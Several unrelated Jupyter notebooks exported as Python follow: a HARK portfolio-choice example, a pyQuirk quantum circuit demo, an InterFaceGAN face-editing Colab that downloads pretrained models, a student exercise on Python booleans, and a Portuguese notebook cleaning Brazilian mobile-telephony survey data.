PortfolioConsumerType(**init_discrete_share) DiscreteType.cycles = 0 t0 = time() DiscreteType.solve() t1 = time() DiscreteType.cFunc = [DiscreteType.solution[t].cFuncAdj for t in range(DiscreteType.T_cycle)] DiscreteType.ShareFunc = [DiscreteType.solution[t].ShareFuncAdj for t in range(DiscreteType.T_cycle)] print('Solving an infinite horizon discrete portfolio choice problem took ' + str(t1-t0) + ' seconds.') # Plot the consumption and risky-share functions print('Consumption function over market resources:') plotFuncs(DiscreteType.cFunc[0], 0., 50.) print('Risky asset share as a function of market resources:') print('Optimal (blue) versus Theoretical Limit (orange)') plt.xlabel('Normalized Market Resources') plt.ylabel('Portfolio Share') plt.ylim(0.0,1.0) # Since we are using a discretization of the lognormal distribution, # the limit is numerically computed and slightly different from # the analytical limit obtained by Merton and Samuelson for infinite wealth plotFuncs([DiscreteType.ShareFunc[0] ,lambda m: DiscreteType.ShareLimit*np.ones_like(m) ] , 0., 200.) print('\n\n\n') "" # Make another example type, but this one can only update their risky portfolio # share in any particular period with 15% probability. init_sticky_share = init_portfolio.copy() init_sticky_share['AdjustPrb'] = 0.15 # Make and solve a discrete portfolio choice consumer type print('Now solving a portfolio choice problem with "sticky" portfolio shares; this might take a moment...') StickyType = PortfolioConsumerType(**init_sticky_share) StickyType.cycles = 0 t0 = time() StickyType.solve() t1 = time() StickyType.cFuncAdj = [StickyType.solution[t].cFuncAdj for t in range(StickyType.T_cycle)] StickyType.cFuncFxd = [StickyType.solution[t].cFuncFxd for t in range(StickyType.T_cycle)] StickyType.ShareFunc = [StickyType.solution[t].ShareFuncAdj for t in range(StickyType.T_cycle)] print('Solving an infinite horizon sticky portfolio choice problem took ' + str(t1-t0) + ' seconds.') # Plot the consumption and risky-share functions print('Consumption function over market resources when the agent can adjust his portfolio:') plotFuncs(StickyType.cFuncAdj[0], 0., 50.) print("Consumption function over market resources when the agent CAN'T adjust, by current share:") M = np.linspace(0., 50., 200) for s in np.linspace(0.,1.,21): C = StickyType.cFuncFxd[0](M, s*np.ones_like(M)) plt.plot(M,C) plt.xlim(0.,50.) plt.ylim(0.,None) plt.show() print('Risky asset share function over market resources (when possible to adjust):') print('Optimal (blue) versus Theoretical Limit (orange)') plt.xlabel('Normalized Market Resources') plt.ylabel('Portfolio Share') plt.ylim(0.0,1.0) plotFuncs([StickyType.ShareFunc[0] ,lambda m: StickyType.ShareLimit*np.ones_like(m) ] , 0., 200.) "" # Make another example type, but this one has *age-varying* perceptions of risky asset returns. # Begin by making a lifecycle dictionary, but adjusted for the portfolio choice model. init_age_varying_risk_perceptions = copy(init_lifecycle) init_age_varying_risk_perceptions['RiskyCount'] = init_portfolio['RiskyCount'] init_age_varying_risk_perceptions['ShareCount'] = init_portfolio['ShareCount'] init_age_varying_risk_perceptions['aXtraMax'] = init_portfolio['aXtraMax'] init_age_varying_risk_perceptions['aXtraCount'] = init_portfolio['aXtraCount'] init_age_varying_risk_perceptions['aXtraNestFac'] = init_portfolio['aXtraNestFac'] init_age_varying_risk_perceptions['BoroCnstArt'] = init_portfolio['BoroCnstArt'] init_age_varying_risk_perceptions['CRRA'] = init_portfolio['CRRA'] init_age_varying_risk_perceptions['DiscFac'] = init_portfolio['DiscFac'] init_age_varying_risk_perceptions['RiskyAvg'] = 10*[1.08] init_age_varying_risk_perceptions['RiskyStd'] = [0.20,0.21,0.22,0.23,0.24,0.25,0.26,0.27,0.28,0.29] init_age_varying_risk_perceptions['RiskyAvgTrue'] = 1.08 init_age_varying_risk_perceptions['RiskyStdTrue'] = 0.20 AgeVaryingRiskPercType = PortfolioConsumerType(**init_age_varying_risk_perceptions) AgeVaryingRiskPercType.cycles = 1 # Solve the agent type with age-varying risk perceptions print('Now solving a portfolio choice problem with age-varying risk perceptions...') t0 = time() AgeVaryingRiskPercType.solve() AgeVaryingRiskPercType.cFunc = [AgeVaryingRiskPercType.solution[t].cFuncAdj for t in range(AgeVaryingRiskPercType.T_cycle)] AgeVaryingRiskPercType.ShareFunc = [AgeVaryingRiskPercType.solution[t].ShareFuncAdj for t in range(AgeVaryingRiskPercType.T_cycle)] t1 = time() print('Solving a ' + str(AgeVaryingRiskPercType.T_cycle) + ' period portfolio choice problem with age-varying risk perceptions took ' + str(t1-t0) + ' seconds.') # Plot the consumption and risky-share functions print('Consumption function over market resources in each lifecycle period:') plotFuncs(AgeVaryingRiskPercType.cFunc, 0., 20.) print('Risky asset share function over market resources in each lifecycle period:') plotFuncs(AgeVaryingRiskPercType.ShareFunc, 0., 200.) # The code below tests the mathematical limits of the model. # + import os # They assume its a polinomial of age. Here are the coefficients a=-2.170042+2.700381 b1=0.16818 b2=-0.0323371/10 b3=0.0019704/100 time_params = {'Age_born': 0, 'Age_retire': 8, 'Age_death': 9} t_start = time_params['Age_born'] t_ret = time_params['Age_retire'] # We are currently interpreting this as the last period of work t_end = time_params['Age_death'] # They assume retirement income is a fraction of labor income in the # last working period repl_fac = 0.68212 # Compute average income at each point in (working) life f = np.arange(t_start, t_ret+1,1) f = a + b1*f + b2*(f**2) + b3*(f**3) det_work_inc = np.exp(f) # Retirement income det_ret_inc = repl_fac*det_work_inc[-1]*np.ones(t_end - t_ret) # Get a full vector of the deterministic part of income det_income = np.concatenate((det_work_inc, det_ret_inc)) # ln Gamma_t+1 = ln f_t+1 - ln f_t gr_fac = np.exp(np.diff(np.log(det_income))) # Now we have growth factors for T_end-1 periods. # Finally define the normalization factor used by CGM, for plots. # ### IMPORTANT ### # We adjust this normalization factor for what we believe is a typo in the # original article. See the REMARK jupyter notebook for details. norm_factor = det_income * np.exp(0) # Create a grid of market resources for the plots mMin = 0 # Minimum ratio of assets to income to plot mMax = 1e4 # Maximum ratio of assets to income to plot mPts = 1000 # Number of points to plot eevalgrid = np.linspace(0,mMax,mPts) # range of values of assets for the plot # Number of points that will be used to approximate the risky distribution risky_count_grid = [5,50] # %% Calibration and solution for rcount in risky_count_grid: # Create a new dictionary and replace the number of points that # approximate the risky return distribution # Create new dictionary merton_dict = init_lifecycle.copy() merton_dict['RiskyCount'] = rcount # Create and solve agent agent = PortfolioConsumerType(**merton_dict) agent.solve() # Compute the analytical Merton-Samuelson limiting portfolio share RiskyVar = agent.RiskyStd**2 RiskPrem = agent.RiskyAvg - agent.Rfree MS_limit = RiskyShareMertSamLogNormal(RiskPrem, agent.CRRA, RiskyVar) # Now compute the limiting share numerically, using the approximated # distribution agent.updateShareLimit() NU_limit = agent.ShareLimit # Plot by ages ages = [2, 4, 6, 8] age_born = time_params['Age_born'] plt.figure() for a in ages: plt.plot(eevalgrid, agent.solution[a-age_born]\ .ShareFuncAdj(eevalgrid/ norm_factor[a-age_born]), label = 'Age = %i' %(a)) plt.axhline(MS_limit, c='k', ls='--', label = 'M&S Limit') plt.axhline(NU_limit, c='k', ls='-.', label = 'Numer. Limit') plt.ylim(0,1.05) plt.xlim(eevalgrid[0],eevalgrid[-1]) plt.legend() plt.title('Risky Portfolio Share by Age\n Risky distribution with {points} equiprobable points'.format(points = rcount)) plt.xlabel('Wealth (m)') plt.ioff() plt.draw() # -
examples/ConsumptionSaving/example_ConsPortfolioModel.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- from pyQuirk import Quirk quirk = Quirk() quirk.width = 800 quirk.height = 300 quirk qasm = """ OPENQASM 2.0; include "qelib1.inc"; qreg q[3]; h q[0]; cx q[0],q[1]; y q[2]; """ quirk.update_from_qasm(qasm)
example.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # name: python3 # --- # + [markdown] id="qJDJLE3v0HNr" # # Fetch Codebase and Models # + id="JqiWKjpFa0ov" import os os.chdir('/content') CODE_DIR = 'interfacegan' # !git clone https://github.com/genforce/interfacegan.git $CODE_DIR os.chdir(f'./{CODE_DIR}') # !wget https://www.dropbox.com/s/t74z87pk3cf8ny7/pggan_celebahq.pth?dl=1 -O models/pretrain/pggan_celebahq.pth --quiet # !wget https://www.dropbox.com/s/nmo2g3u0qt7x70m/stylegan_celebahq.pth?dl=1 -O models/pretrain/stylegan_celebahq.pth --quiet # !wget https://www.dropbox.com/s/qyv37eaobnow7fu/stylegan_ffhq.pth?dl=1 -O models/pretrain/stylegan_ffhq.pth --quiet # + [markdown] id="hQ_IXBZr8YcJ" # # Define Utility Functions # + id="ijKTlG5GeTd3" import os.path import io import IPython.display import numpy as np import cv2 import PIL.Image import torch from models.model_settings import MODEL_POOL from models.pggan_generator import PGGANGenerator from models.stylegan_generator import StyleGANGenerator from utils.manipulator import linear_interpolate def build_generator(model_name): """Builds the generator by model name.""" gan_type = MODEL_POOL[model_name]['gan_type'] if gan_type == 'pggan': generator = PGGANGenerator(model_name) elif gan_type == 'stylegan': generator = StyleGANGenerator(model_name) return generator def sample_codes(generator, num, latent_space_type='Z', seed=0): """Samples latent codes randomly.""" np.random.seed(seed) codes = generator.easy_sample(num) if generator.gan_type == 'stylegan' and latent_space_type == 'W': codes = torch.from_numpy(codes).type(torch.FloatTensor).to(generator.run_device) codes = generator.get_value(generator.model.mapping(codes)) return codes def imshow(images, col, viz_size=256): """Shows images in one figure.""" num, height, width, channels = images.shape assert num % col == 0 row = num // col fused_image = np.zeros((viz_size * row, viz_size * col, channels), dtype=np.uint8) for idx, image in enumerate(images): i, j = divmod(idx, col) y = i * viz_size x = j * viz_size if height != viz_size or width != viz_size: image = cv2.resize(image, (viz_size, viz_size)) fused_image[y:y + viz_size, x:x + viz_size] = image fused_image = np.asarray(fused_image, dtype=np.uint8) data = io.BytesIO() PIL.Image.fromarray(fused_image).save(data, 'jpeg') im_data = data.getvalue() disp = IPython.display.display(IPython.display.Image(im_data)) return disp # + [markdown] id="Q7gkmrVW8eR1" # # Select a Model # + id="NoWI4fPQ6Gnf" #@title { display-mode: "form", run: "auto" } model_name = "stylegan_ffhq" #@param ['pggan_celebahq','stylegan_celebahq', 'stylegan_ffhq'] latent_space_type = "W" #@param ['Z', 'W'] generator = build_generator(model_name) ATTRS = ['age', 'eyeglasses', 'gender', 'pose', 'smile'] boundaries = {} for i, attr_name in enumerate(ATTRS): boundary_name = f'{model_name}_{attr_name}' if generator.gan_type == 'stylegan' and latent_space_type == 'W': boundaries[attr_name] = np.load(f'boundaries/{boundary_name}_w_boundary.npy') else: boundaries[attr_name] = np.load(f'boundaries/{boundary_name}_boundary.npy') # + [markdown] id="zDStH1O5t1KC" # # Sample latent codes # + id="qlRGKZbJt9hA" #@title { display-mode: "form", run: "auto" } num_samples = 4 #@param {type:"slider", min:1, max:8, step:1} noise_seed = 0 #@param {type:"slider", min:0, max:1000, step:1} latent_codes = sample_codes(generator, num_samples, latent_space_type, noise_seed) if generator.gan_type == 'stylegan' and latent_space_type == 'W': synthesis_kwargs = {'latent_space_type': 'W'} else: synthesis_kwargs = {} images = generator.easy_synthesize(latent_codes, **synthesis_kwargs)['image'] imshow(images, col=num_samples) # + [markdown] id="MmRPN3xz8jCH" # # Edit facial attributes # + id="ccONBF60mVir" #@title { display-mode: "form", run: "auto" } age = 0 #@param {type:"slider", min:-3.0, max:3.0, step:0.1} eyeglasses = 0 #@param {type:"slider", min:-2.9, max:3.0, step:0.1} gender = 0 #@param {type:"slider", min:-3.0, max:3.0, step:0.1} pose = 0 #@param {type:"slider", min:-3.0, max:3.0, step:0.1} smile = 0 #@param {type:"slider", min:-3.0, max:3.0, step:0.1} new_codes = latent_codes.copy() for i, attr_name in enumerate(ATTRS): new_codes += boundaries[attr_name] * eval(attr_name) new_images = generator.easy_synthesize(new_codes, **synthesis_kwargs)['image'] imshow(new_images, col=num_samples)
docs/InterFaceGAN.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # name: python3 # --- # + id="7JIFn6BP4M0R" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="bef624fe-afe7-499d-95fb-d25346400e22" #Declare a boolean value and store it in a variable. s= True #Check the type and print the id of the same. print(type(s),id(s)) # + id="o9bjjhN64kAP" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="7772a180-5131-48ef-ce7b-87ba0addb960" #Take one boolean value between 0 - 256. #Assign it to two different variables. #Check the id of both the variables. It should come same. Check why? a = 20 b= 20 print(id(c)) print(id(d)) both the id are same because of object reusabiity. 20<256 # + id="yr4ETGSf4l5y" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 85} outputId="c2ade20e-e09b-426c-f94a-924d3ee9aa29" #Arithmatic Operations on boolean data #Take two different boolean values. #Store them in two different variables. #Do below operations on them:- #Find sum of both values #Find differce between them #Find the product of both. #Find value after dividing first value with second value #Find the remainder after dividing first value with second value #Find the quotient after dividing first value with second value #Find the result of first value to the power of second value. a= True b= False sum= a+b dif= a-b product= a*b #division= a/b #quotient= a//b #remainder = a%b pow= a**b print("sum=", sum) print("difference=",dif) print("prouct=",product) # print("division",division) # print("remainder=",remainder) # print("quotient=", quotient) print("power=", pow) #division quotient and remainder can not be calculated as false is considered ad "0" # + id="xG4mX84E4n2O" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 68} outputId="4ee560b7-cd9b-4d0e-c639-f1c661ca19ff" #Comparison Operators on boolean values #Take two different boolean values. #Store them in two different variables. #Do below operations on them:- #Compare these two values with below operator:- #Greater than, '>' #less than, '<' #Greater than or equal to, '>=' #Less than or equal to, '<=' #Observe their output(return type should be boolean) a= False b= True print(False<True) print(False>=True) print(False<=True) # + id="TUIo2Z9V4qBJ" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="0b8a3156-8165-4cc6-ed32-e18a6281267b" #Equality Operator #Take two different boolean values. #Store them in two different variables. #Equuate them using equality operator (==, !=) #Observe the output(return type should be boolean) a= False b= True print(False==True) print(False!=True) # + id="XukEq5E44rxv" colab_type="code" colab={} #Logical operators #Observe the output of below code #Cross check the output manually print(True and True) #----------------------------------------->Output is True print(False and True) #----------------------------------------->Output is False print(True and False) #----------------------------------------->Output is False print(False and False) #----------------------------------------->Output is False print(True or True) #----------------------------------------->Output is True print(False or True) #----------------------------------------->Output is True print(True or False) #----------------------------------------->Output is True print(False or False) #----------------------------------------->Output is False print(not True) #----------------------------------------->Output is False print(not False) #----------------------------------------->Output is True # + id="02jPgt094vK-" colab_type="code" colab={} #Bitwise Operators #Do below operations on the values provided below:- #Bitwise and(&) -----------------------------------------> True, True -------> Output is True #Bitwise or(|) -----------------------------------------> True, False -------> Output is True #Bitwise(^) -----------------------------------------> True, False -------> Output is True #Bitwise negation(~) ------------------------------------> True -------> Output is -2 #Bitwise left shift ------------------------------------> True,2 -------> Output is 4 #Bitwise right shift ------------------------------------> True,2 -------> Output is 0 #Cross check the output manually # + id="cy5i7sWz4v_c" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 85} outputId="3d9408c0-5659-4076-d09b-a23faf1cebcf" #What is the output of expression inside print statement. Cross check before running the program. a = True b = True print(a is b) #True or False? # print(a is not b) #True or False? a = False b = False print(a is b) #True or False? print(a is not b) #True or False? # + id="AOcPQi8544M-" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 102} outputId="92278e0f-3061-4632-b2a2-326921e098ef" #Membership operation #in, not in are two membership operators and it returns boolean value print(True in [10,10.20,10+20j,'Python', True]) print(False in (10,10.20,10+20j,'Python', False)) print(True in {1,2,3, True}) print(True in {True:100, False:200, True:300}) print(False in {True:100, False:200, True:300}) # + id="MPa1Lpco46Ja" colab_type="code" colab={}
shilpi/shilpi_Boolean_Assignement.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Insper - PADS - Atividade Integradora # # ## Computação para Ciência de Dados - Processamento dos dados # Autores: # - <NAME> (<EMAIL>) # # - <NAME> (<EMAIL>) # # Para visualizar o índice, é indicada a instalação do add-in [jupyterlab-toc](https://github.com/jeffjjohnston/RStudioConsoleRender). # # Introdução # # O intuito deste trabalho é preparar e analisar dados de entrevistas de uma pesquisa de satisfação de prestação de Serviço Móvel pessoal. Posteriormente, serão aplicados modelos preditivos em R para criar um classificador de satisfação (alta ou baixa) de clientes. A variável resposta é a J1 - Nível de satisfação geral do entrevistado com a prestadora citada, levando em conta toda a experiência. # # A base de dados utilizada está disponível [neste link](http://dados.gov.br/dataset/banco-de-dados-da-pesquisa-telefonia-movel-pre-paga). # # ## Objetivo # # Preparar, organizar e analisar graficamente os dados para modelagem preditiva, principalmente com as bibliotecas [Pandas](https://pandas.pydata.org) e [Matplotlib](https://matplotlib.org). # ## Bibliotecas import pandas as pd import numpy as np import datetime as dt from pandas_ods_reader import read_ods import matplotlib.pyplot as plt from matplotlib.ticker import PercentFormatter import seaborn as sns import pandasql # %matplotlib inline # ## Dados # Como o pandas nativo não lê arquivos ODS, utilizou-se uma biblioteca específica. raw = read_ods('data/BD_PRE.ods', sheet = 1) bd_pre = raw.copy() # Após a leitura é possível ter uma ideia do conteúdo e formato das variáveis presentes na base de dados: bd_pre.head() bd_pre.info() # # Organização e limpeza # # Antes de manipular a base, foi consultada a documentação para entender melhor cada questão. A seguir um resumo. # ## Tipos de variáveis # # * Tipo 1: **1 = Sim ou 2 = Não** # - Colunas: Q1, Q3, Q4, Q5, D1, F1, F3, F5, I1 e I2 # # # * Tipo 2: variáveis medidas em uma escala de percepção de qualidade, que varia de **0 (Péssimo) a 10 (Excelente), ou 99 (Não Sabe, Não Responde)** # - Colunas: B1 (B1_1 e B1_2), C1 (C1_1 e C1_2), D2 (D2_1 à D2_3), E1 (E1_1 à E1_3), A2 (A2_1 à A2_3), A3, A4, A5, F2, F4, F6 # # # * Tipo 3: variáveis que não possuem opções de escolha, apenas entrada direta de informações # - Colunas: Q8, H0, H1 e H2 # # # * Tipo 4: variáveis que possuem suas opções específicas diretamente após sua definição # - As variáveis Q2, H2 e I1 possuem opções de resposta diferentes para os questionários ao longo dos anos e estarão devidamente indicadas. # - As variáveis H0 e I2 foram acrescentadas a partir da pesquisa do ano de 201 # ## Itens da pesquisa # # - Q: Perguntas # - A: Canais de Atendimento # - B: Oferta e Contratação # - C: Funcionamento de Voz # - D: Funcionamento de Dados (3G/4G) # - E: Recarga # - F: Capacidade de Resolução # - G: Competição # - H: Perfil Sócio demográfico # - I: Autorização para identificação # ## Limpeza da base # ### Ajuste de datas # Como a base é muito grande, o ajuste do formato da data na leitura pode sobrecarregar ou deixar ainda mais demorado o processo de leitura. Portanto o ajuste é feito após a base ser carregada no pandas. bd_pre['DATA'] = pd.to_datetime(bd_pre['DATA'], format='%Y-%m-%d') bd_pre['ANO_BASE'] = bd_pre['ANO_BASE'].astype(int) bd_pre.info() # ### Padronização # Como a pesquisa foi realizada em momentos diferentes, algumas respostas mudam ao longo dos anos. Para modelar, é necessário padronizar essas respostas. # - Q2 - Área de trabalho do entrevistado: bd_pre.Q2.unique() # Segundo a documentação, 7 é a resposta do ano 2015 e corresponde a "Nenhum dos lugares informados". Pode, portanto, ser substituída por 2, que representa a mesma coisa nos anos subsequentes. bd_pre.Q2.replace(7,2, inplace = True) # - H2 - Faixa de renda bd_pre.H2.describe() # A diferença está apenas nas respostas não dadas: 999997, 999998 - sem renda/não sabe, e 999999 - recusa. Nesse primeiro momento, serão substituídas por NaN. para avaliar a distribuição da amostra sem esses valores. # (O comentário ao lado de cada linha representa a média quando o valor é substituído por 0) bd_pre.H2.replace([999997,999998], np.nan, inplace = True) #0: média 1540 bd_pre.H2.replace([999999], np.nan, inplace = True) #tudo NA: média 1965 +-3718 bd_pre.H2.describe() # Como alguns modelos não aceitam valores faltantes, todos eles serão susbtituídos por 0. Como o valor mínimo é 100, ainda é possível identificar quem não quis compartilhar essa informação. bd_pre.H2.fillna(0, inplace = True) # - H2a - Faixa de renda vs Salário mínimo bd_pre.H2a.describe() # Antes de tratar os casos não respondidos dessa questão, podemos extrair informações para a pergunta anterior. A seguir, as pessoas que não informaram a renda, mas informaram a faixa: bd_pre[['H2','H2a']][bd_pre['H2'] == 0].groupby(['H2a']).count() (6298+1268+438+197+156)/148016*100 # 6% da base pode ter a informação de renda preenchida pela faixa. Para isso, será criada uma nova coluna combinando os dados das duas colunas mais adiante. # Vale observar também se existem pessoas que não informaram a faixa, mas informaram a renda. bd_pre[['H2','H2a','ANO_BASE']][bd_pre.H2a.isna()] # Como a resposta 999998 não está na documentação da questão H2a, será considerada como "Não respondeu", análoga ao item anterior. # Assim como no item H2, todos que não informaram a renda terão o valor substituído por 0: Faixa não informada bd_pre.H2a.replace([98,99,999998,999999],0,inplace = True) # + #bd_pre.ANO_BASE.unique() # + #conditions = [bd_pre.ANO_BASE <= 2016, bd_pre.ANO_BASE >= 2017] # + #choice_0 = [bd_pre.H2a.replace([98,99],0, inplace = True),bd_pre.H2a.replace([999998], np.nan, inplace = True)] np.nan #choice_na = [bd_pre.H2a.replace([999998, 999998], np.nan, inplace = True), bd_pre.H2a.replace([99], np.nan, inplace = True)] #np.nan # + #np.select(conditions,choice_0) #np.select(conditions,choice_na) # - bd_pre.H2a.value_counts() bd_pre.H2a.describe() # A seguir, observa-se a distribuição das respostas por ano e quantas pessoas informaram ou não a renda na questão H2. pd.crosstab(index=bd_pre['ANO_BASE'], columns=bd_pre['H2a']) pd.crosstab(index=bd_pre['ANO_BASE'], columns=bd_pre['H2']==0) # Considerando as duas tabelas acima (coluna 0 da primeira e coluna True da segunda), nota-se que nos dois primeiros anos da pesquisa, quem não informou a renda também não informou a faixa. Como o número de respostas que podem ser completadas é pequeno, será mantida a resposta "0" para quem não compartilhou essa informação. # - H2b - Combinação das colunas H2 e H2a para estimar a renda. # Na documentação, constam as faixas e valores por salário mínimo. No entanto, as informações vão até 2017, enquanto os dados vão até 2019. Para contornar essa falta de informação, serão puxados os dados sobre valores nominais do salário mínimo. Idealmente, esses dados estariam disponíveis no [Portal Brasileiro de Dados Abertos](http://www.dados.gov.br/dataset/salario-minimo/resource/8b9ccf0d-aff2-499f-8363-0fcd44ec68b3), mas o link parece não estar funcionando, e a última atualização dos dados foi em 2016. # # Felizmente, essa informação está disponível em csv no [IPEADATA](http://www.ipeadata.gov.br/Default.aspx), alimentada pelo Ministério do Trabalho e Emprego. sm = pd.read_csv('data/ipeadata[15-04-2020-08-50].csv', usecols = [0,1], names = ['Data','Valor'], skiprows = 1, dtype = {'Data': object}) sm.head() sm.info() sm[['Ano','Mes']] = sm.Data.str.split('.', expand = True) sm.head() sm.Ano = sm.Ano.astype(int) # Como o valor é o mesmo para todos os anos, pode-se agrupar a base: sm_ano = sm.groupby('Ano').mean() # Dessa forma, temos os mesmos valores que constam na documentação: sm_ano.tail(6) # Abaixo, os valores que podem ser substituídos: pd.crosstab(index=bd_pre['ANO_BASE'], columns=bd_pre['H2a'][bd_pre['H2'] == 0]) # Como a divisão das faixas da questão H2a variam ano a ano, e as informações que podem ser substituídas começam em 2017, será adotada a divisão de para esses dados. Além disso, será considerado o valor médio de cada faixa, exceto pela primeira e pela última. Como as faixas de 2015 são diferentes, esse ano será tratado separadamente. faixas = {0:0, 1:2, 2:(2+4)/2, 3:(4+6)/2, 4:(6+10)/2, 5:10} #faixa : múltiplos do salário mínimo faixas faixas_15 = {0:0, 1:1, 2:(1+2)/2, 3:(3+4)/2, 4:(4+6)/2, 5:(6+10)/2, 6:10} faixas_15 bd_pre['sm'] = bd_pre.ANO_BASE.map(sm_ano.Valor) #busca o valor de salário mínimo para cada ano bd_pre.head() conditions = [bd_pre.ANO_BASE == 2015, bd_pre.ANO_BASE >= 2016] choice = [bd_pre.H2a.map(faixas_15), bd_pre.H2a.map(faixas)] bd_pre['sm_mult'] = np.select(conditions,choice) bd_pre['H2b'] = np.where(bd_pre.H2 !=0 , bd_pre.H2, bd_pre['sm_mult'].mul(bd_pre.sm)) #multiplica a faixa por valor do salário mínimo bd_pre.head() bd_pre.H2b.describe() bd_pre.H2.describe() # Com a coluna criada, pode-se remover as colunas auxiliares criadas: bd_pre.drop(['sm','sm_mult'], axis = 1, inplace = True) bd_pre.head() # - I1 - Autorização para identificação das respostas para a empresa que solicitou a pesquisa (2015) ou para a Anatel (a partir de 2016) pd.crosstab(index=bd_pre['ANO_BASE'], columns=bd_pre['I1']) # Na documentação, consta que a resposta 3 é correspondente a "Não sabe". Como é uma amostra pequena, será mantida na base, mas com o valor 0. bd_pre['I1'].replace(3,0, inplace = True) # ### Tratamento de NAs # Colunas com valores faltando: colunas_na = bd_pre.columns[bd_pre.isna().any()].sort_values() colunas_na # Valores de resposta em cada questão: for col in colunas_na: print(col, bd_pre[col].unique()) # - Perguntas com resposta Sim/Não: # Para otimizar, foi criada uma função para substituir os valores conforme cada questão. def na_sim_nao(col, valor_sim, valor_nao = 'na', fill_na = 2): bd_pre[col].replace(valor_sim,1,inplace = True) bd_pre[col].fillna(fill_na, inplace = True) if valor_nao != 'na': bd_pre[col].replace(valor_nao, 2,inplace = True) for i in range(1,5): #print('A1_'+str(i), bd_pre['A1_'+str(i)].unique()) print('A1_'+str(i)+'\n', bd_pre['A1_'+str(i)].value_counts()) #respostas 'Sim' print('') na_sim_nao('A1_1',1) na_sim_nao('A1_2',2) na_sim_nao('A1_3',3) na_sim_nao('A1_4',97) #conferência dos valores substituídos. for i in range(1,5): #print('A1_'+str(i), bd_pre['A1_'+str(i)].unique()) print('A1_'+str(i)+'\n', bd_pre['A1_'+str(i)].value_counts()) print('') # - F5 - A questão F5 depende da resposta da pergunta D1: # # "Descreve se o usuário entrou em contato com a prestadora citada para falar sobre problemas na internet 3G/4G nos 6 meses anteriores à pesquisa, apenas para os que responderam SIM para a utilização da internet móvel (D1)" # # D1: Descreve se o usuário utilizou o serviço de internet 3G/4G seis meses anteriores à pesquisa." # Entende-se, portanto que quem respondeu "não" à pergunta D1, também não entrou em contato para falar sobre esse assunto. Os valores faltantes serão substituídos por 2, que significa "Não" print(bd_pre.D1.value_counts()) bd_pre.D1.value_counts().sum() bd_pre[['D1','F5']] bd_pre['F5'][bd_pre['D1']==2].unique() bd_pre.F5.fillna(2,inplace = True) bd_pre.F5.value_counts() # - I2 - Assim como na questão I1, os valores faltantes serão padronizados para 0 - "Não sabe", para uma análise preliminar. pd.crosstab(index=bd_pre['ANO_BASE'], columns=bd_pre['I2']) pd.crosstab(index=bd_pre['ANO_BASE'], columns=bd_pre.I2.fillna(0)) # Conforme consta na documetnação, essa pergunta não foi realizada nem em 2015, e aparentemente nem em 2019. Uma solução seria replicar a resposta da coluna I1, visto que as perguntas são parecidas. Para isso, é necessário avaliar se as respostas que foram dadas são iguais nas duas colunas. bd_pre.I2[bd_pre.I1 == 1].fillna(0).value_counts() bd_pre.I2[bd_pre.I1 == 2].fillna(0).value_counts() # Como é observado, podem existir respostas para as perguntas I1 diferentes da I2, portanto, a melhor alternativa é substituir o valor faltante por 0: "Não sabe" bd_pre.I2.fillna(0, inplace = True) # - Perguntas com respostas contínuas que possuem NA na resposta: colunas_na = bd_pre.columns[bd_pre.isna().any()].sort_values() colunas_na col_na = colunas_na #.drop(['H2','H2a']) #tirando variáveis de renda col_na # Para todas as perguntas, 99 significa 'Não sabe' ou 'Não respondeu'. Portanto, os NAs serão substituídos por 99. for col in col_na: bd_pre[col].fillna(99, inplace = True) # Com isso, todos os valores faltantes foram eliminados da base: bd_pre.info() # Para facilitar a vizualização, as respostas não dadas (99) de todas as perguntas do Tipo 2 serão substituídas por -1. tipo_2 = ['B1_1','B1_2','C1_1','C1_2','D2_1','D2_3','E1_1','E1_2','E1_3','A2_1','A2_2','A2_3','A3','A4','A5','F2','F4','F6'] for col in tipo_2: bd_pre[col].replace(99,-1,inplace = True) # Além das perguntas tipo 2, algumas outras questões possuem valores "não informados". Esses casos serão tratados a seguir: # - Q8 - Idade do entrevistado bd_pre.Q8.describe() # Como algumas pessoas não identificaram a idade, esse valor será primeiramente substituído por NaN, para que a média real da base seja revelada. bd_pre.Q8.replace(999999,np.nan, inplace = True) bd_pre.Q8.describe() # - Q8a - Faixa etária bd_pre.Q8a.describe() # Aparentemente não houve nenhuma resposta em que não foi informada a faixa etária. Também não houve nenhum entrevistado com menos de 18 anos. pd.crosstab(index=bd_pre['ANO_BASE'], columns=bd_pre['Q8a']) bd_pre.Q8a.value_counts() bd_pre.Q8a[bd_pre.Q8.isna()].value_counts() # Como a informação da faixa etária está disponível em todos os casos, e o valor é pequeno considerando o tamaho da amostra, a resposta da idade Q8 será substituída pela média da faixa etária, conforme consta na documentação: # 1. Menor de 16 # 2. De 16 a 17 anos # 3. De 18 a 24 anos # 4. De 25 a 30 anos # 5. De 31 a 35 anos # 6. De 36 a 40 anos # 7. De 41 a 50 anos # 8. De 51 a 70 anos # 9. Mais de 70 anos # # 99 Recusa # idade_avg = {3:(18+24)/ 2 , 4:(25+30)/ 2 , 5:(31+35)/ 2, 6:(36+40)/ 2 , 7:(41+50)/ 2 , 8: (51+70)/2, 9: 70} idade_avg # Por fim, os valores NA da questão Q8 são substituídos com a média da idade de cada faixa. bd_pre.Q8.describe() bd_pre.Q8.fillna(bd_pre.Q8a.map(idade_avg), inplace = True) bd_pre.Q8.describe() # Como é possível observar, a média final e desvio padrão da base sofreram uma alteração mínima (a média foi de 36.839180 para 36.846797). # - H0: Cidade bd_pre.H0.value_counts() # Aparentemente, a maior ocorrência é "vazia". Nesses casos, será substituída por "OUTRA", como já consta na base. bd_pre.H0.replace('','OUTRA', inplace = True) bd_pre.H0.value_counts() # - COD_IBGE 